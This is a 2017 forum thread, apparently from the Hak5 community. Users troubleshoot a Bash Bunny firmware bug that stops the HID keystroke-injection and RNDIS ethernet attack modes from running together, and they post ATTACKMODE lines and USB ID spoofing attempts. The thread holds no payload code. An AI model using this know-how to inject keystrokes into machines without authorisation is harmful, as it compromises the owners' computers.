Dave-ee Jones Posted April 19, 2017 Share Posted April 19, 2017 Yes, I know I myself have addressed this issue on numerous other posts but this is slightly different... I want to use this line (tried either or): ATTACKMODE RNDIS_ETHERNET HID or ATTACKMODE HID RNDIS_ETHERNET However, I get the issue where the ethernet adapter doesn't start up, and therefore the PC doesn't get an IP and doesn't even show it is connected on another network (usually Network 2). I would usually address this issue and say "Just swap ATTACKMODEs when you need to" but in this instance, I cannot. I need to use a HID attack WHILE I am hosting a webserver over ethernet, which I cannot do because of the silly 'One Attack at a Time, People!' bug. A fix would be good :) Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted April 19, 2017 Share Posted April 19, 2017 1 hour ago, Dave-ee Jones said: Yes, I know I myself have addressed this issue on numerous other posts but this is slightly different... I want to use this line (tried either or): ATTACKMODE RNDIS_ETHERNET HID or ATTACKMODE HID RNDIS_ETHERNET However, I get the issue where the ethernet adapter doesn't start up, and therefore the PC doesn't get an IP and doesn't even show it is connected on another network (usually Network 2). I would usually address this issue and say "Just swap ATTACKMODEs when you need to" but in this instance, I cannot. I need to use a HID attack WHILE I am hosting a webserver over ethernet, which I cannot do because of the silly 'One Attack at a Time, People!' bug. A fix would be good :) A fix is in the works for v1.3. Firmware v1.2 is currently undergoing some last testing. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted April 20, 2017 Author Share Posted April 20, 2017 19 hours ago, Sebkinne said: A fix is in the works for v1.3. Firmware v1.2 is currently undergoing some last testing. Eh? I thought it was being fixed in 1.2? Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted April 26, 2017 Share Posted April 26, 2017 Yeah, noticed this bug too. Â I wanted to do combo but looks like it doesnt find drivers for the NIC if you use it with another mode. Notice this in the load mode the serial is not recognized. Using HID and ethernet I am waiting for to, Â It will make the BBTPS I have built more responsive instead of a download cradle having to check for when the server is available I could launch the HID when the IP is available leaving just the load time for the js server which is very quick. Â From what I see it takes longer for the attack mode to switch. Â Waiting for the Target and Host IP to available would fix waiting for the drivers to install and what not. Â 1 Quote Link to comment Share on other sites More sharing options...
HeavenknowsItried Posted April 26, 2017 Share Posted April 26, 2017 @Sebkinne Do you fix it by changing rndis kernel driver or work-around it by attackmode RNDIS first then hid + rndis? Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted April 27, 2017 Share Posted April 27, 2017 I think the issue is not that it is missing initialization but that when used in combination the rndis is not seen as the standard IBM device anymore but takes on another ID. Â One thing I can try is the PID/VID options, get the deviceID from the known driver and see if they can be spoofed to work in combination. Â Hmmm, will have to try tomorrow morning unless someone gets the bug and beats me to it before then and finds out. Â :-P Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted April 27, 2017 Share Posted April 27, 2017 Welp, I know you can get HID ECM_ETHERNET to work with the below command and VID, I used the VID that came up in linux lsusb for the device in ECM_ETHERNET mode. ATTACKMODE HID ECM_ETHERNET VID_0XF000 PID_0XFF13 Â Windows with the HID RNDIS_ETHERNET are no joy no matter what I try. Â Notice that the device when ran by itself doesn't match any of the devices in the wiki list. Â In windows up comes up as: VID_0X04B3 PID_0X4010 Â I tried to append that on at the end since when I did HID RNDIS_ETHERNET it was the ethernet that was off but then the opposite happened. Â The ethernet came on but HID never does work. In Linux under lsusb I only see the 1 device which is the one above for ECM. Â In Windows I see the same as 1 device comes up but the quack commands I have in place to test never type out. In fact it seems to stick with the light after the attackmode before the quack commands which make me thing quack is getting stuck cause the HID mode driver never loads for some reason. Â Conflict? Just for kicks I did the ecm one on Windows and the expected happened, no drivers for the CDC_ECM but the keyboard did type. Â Wonder if there is a CDC_ECM driver built inside windows, get the device ID of that I wonder if the dual command will work without having to load drivers. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted April 28, 2017 Author Share Posted April 28, 2017 On 4/26/2017 at 10:31 AM, PoSHMagiC0de said: Yeah, noticed this bug too. Â I wanted to do combo but looks like it doesnt find drivers for the NIC if you use it with another mode. Notice this in the load mode the serial is not recognized. Using HID and ethernet I am waiting for to, Â It will make the BBTPS I have built more responsive instead of a download cradle having to check for when the server is available I could launch the HID when the IP is available leaving just the load time for the js server which is very quick. Â From what I see it takes longer for the attack mode to switch. Â Waiting for the Target and Host IP to available would fix waiting for the drivers to install and what not. Â Indeed. It would significantly help my case, as I'm trying to use some Powershell commands that require the Bunny to have ethernet mode on. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 1, 2017 Author Share Posted May 1, 2017 (edited) Soooooo.... BUMP! :P Has anyone got any temporary fixes for this? This issue is the bane of my payload right now... Checked the Hardware IDs of my BashBunny, and I'm getting these: VID_F000 & PID_FFF0. Along with an REV and MI ID as well. Can I spoof the HID/RNDIS attack using these or no? Edited May 1, 2017 by Dave-ee Jones Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted May 1, 2017 Share Posted May 1, 2017 44 minutes ago, Dave-ee Jones said: Soooooo.... BUMP! :P Has anyone got any temporary fixes for this? This issue is the bane of my payload right now... Checked the Hardware IDs of my BashBunny, and I'm getting these: VID_F000 & PID_FFF0. Along with an REV and MI ID as well. Can I spoof the HID/RNDIS attack using these or no? Depending on what I hear from Darren today we'll either release 1.2 and 1.3-RC1 (with this issue hopefully fixed), or roll it all into 1.3 and release that. Keep an eye out for the new thread. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 1, 2017 Author Share Posted May 1, 2017 1 minute ago, Sebkinne said: Depending on what I hear from Darren today we'll either release 1.2 and 1.3-RC1 (with this issue hopefully fixed), or roll it all into 1.3 and release that. Keep an eye out for the new thread. Sounds good. I will keep an eye out for it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.